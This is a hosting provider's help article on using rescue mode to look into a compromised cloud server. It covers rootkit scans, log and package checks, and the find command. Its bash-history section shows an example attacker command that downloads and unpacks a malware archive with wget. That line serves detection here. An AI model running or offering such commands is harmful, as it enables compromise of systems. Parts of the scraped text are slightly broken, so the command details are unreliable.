Check for a security compromise: Rescue mode investigation
In the article Check for a security compromise: Back doors and intruders,
you learned some basic techniques for collecting the information needed to
identify intruders who have compromised your server. This article describes how
to use the Cloud Control Panel's Rescue Mode
to take a closer look at your system. You can use rescue mode to better understand
how your server was compromised and to identify non-compromised files before
backing up the data.
Activate rescue mode
Because your Cloud Server's operating system might also be compromised, you
cannot rely on it. The intruder could have compromised binaries such as 'ls,'
'find,' and 'netstat,' so their output could mislead you. Consequently, you
must use a different operating system environment to safely investigate the
You can do this by using the rescue mode feature provided in the
Cloud Control Panel. For instructions and more
information, see Rescue Mode.
While your server is in rescue mode, you can perform the following actions to
locate the source of the compromise.
Scan for rootkits
We recommend that you install and use the following tools to scan your system
for rootkits.
Scan for rootkits with chkrootkit
looks for known signatures in compromised binary systems. For
example, some compromised versions of ps
have "/dev/ptyp
" inside them. We
recommend installing chkrootkit
by using your package manager rather than
compiling from source. For more options and information on using chkrootkit,
To install it, run the following command:
apt-get install chkrootkit
against the mounted file system of the Cloud Server:chkrootkit -r /mnt/demo
The following messages are printed by chkrootkit
during its tests:
- the test has identified a command probably modified by a known rootkit -
not infected
- the test didn't find any known rootkit signature -
not tested
- the test was not performedThis could happen in the following situations:
- The test is OS specific
- The test depends on an external program that is not available
- Some specific command line options are given (for example,
not found
- the command to be tested is not found -
Vulnerable but disabled
- the command is infected
For more options and information on using chkrootkit
, see
Scan for rootkits with rkhunter
Rootkit Hunter (rkhunter
) checks systems against a database of known rootkits.
It can also check other system files to make sure they are in line with expected
properties and values.
Log in to your terminal application and change to your
directory:cd ~/sources
Download the latest version of
from the SourceForge download area:
After you install
, run it against/mnt/demo
.rkhunter -c -r /mnt/demo
produces warnings during the tests that indicate where a file has
deviated from expected defaults. Following the test, you can check the log to
see more detailed information about which files produced the warning. For more
options and information on using rkhunter
, see
Check last commands
To get an idea of how the Cloud Server security was breached, check which users
ran commands before the Cloud Server was compromised.
The .bashhistory file contains the last commands used with the Bash shell.
You need to check the .bashhistory files in each user's home directory. The
most important .bashhistory file is the one belonging to root: /root/.bashhistory.
A compromised Cloud Server might have entries like the following ones:
wget https://malware.tar.gz
gunzip malware.tar.gz
tar xf malware.tar
Check installed packages
All changes to the packaging system are stored in /var/log/dpkg.log on
Debian-based distributions. Check this file for any suspicious activity like
installed or removed packages, or a modified bus.
Run the following command to show the last 50 lines of the dpkg.log file:
tail 50 /mnt/demo/var/log/dpkg.log
Use the find command
The find
command is usually used to find filenames with specific patterns.
However, you can also use it to find the files that were modified or accessed
within a specific time period.
For example, you can find all files in /etc owned by root that have been
modified within the last two days, as follows:
find /mnt/demo/etc -user root -mtime -2
Available options are as follows:
-atime: when the file was last accessed
-ctime: when the file's permissions were last changed
-mtime: when the file's data was last modified
Note the minus sign in front of '2' in the preceding example. The 'time'
options for the find
command are expressed in 24-hour increments, and the
symbol used in front of the number can indicate less than or greater than.
Thus '-2' means that you want to find files that were modified within the last
two days. If you want to find files that were modified more than 2 days ago,
use +2
find /mnt/demo/etc -user root -mtime +2
There are also versions of the atime
, ctime
, and mtime
arguments that
measure time in minutes:
-amin: when (in minutes) the file was last accessed
-cmin: when (in minutes) the file's permissions were last changed
-mmin: when (in minutes) the file's data was last modified
Find all of the files in your Cloud Server owned by the demo
that have been accessed within the last five minutes:
find /mnt/demo -user demo -amin -5
The following list of find
command options might be useful while investigating
the compromised Cloud Server investigation:
-nouser: shows output not associated with an existing userid
-nogroup: shows output not associated with an existing groupid
-links n: file has n links
-newer file: file was modified more recently than file
-perm mode: file has mode permissions
Check logs and suspicious files
You can find an intruder by checking for suspicious files in /tmp,
/var/tmp, /dev/shm, /var/spool/samba, /var/spool/squid, and
You can also look at log files in the /var/log directory. For example,
auth.log records user login information, including IP addresses.
In Checking for a security compromise: Backdoors and Intruders,
you learned some techniques to use to discover back doors and track intruders
on your Cloud Server. This will help you to avoid the situation or mistake that
led to the compromise, minimizing the chance of future compromises. In this
article, you learned how to investigate your Cloud Server in rescue mode.
Whether it is caused by viruses, file corruption, machine failure, or
other unforeseen mishaps, the possibility of data loss is real. To avoid the
disruption such a loss can cause, back up your files regularly. Following are
some options to help you secure your files:
- Rackspace Cloud Backup is a good
choice for Cloud Servers customers. It is fully integrated with Cloud Servers,
and is a file-based backup alternative to whole image server backup. - For those who prefer to do it themselves, see Back up your files with rsync.
Updated 5 days ago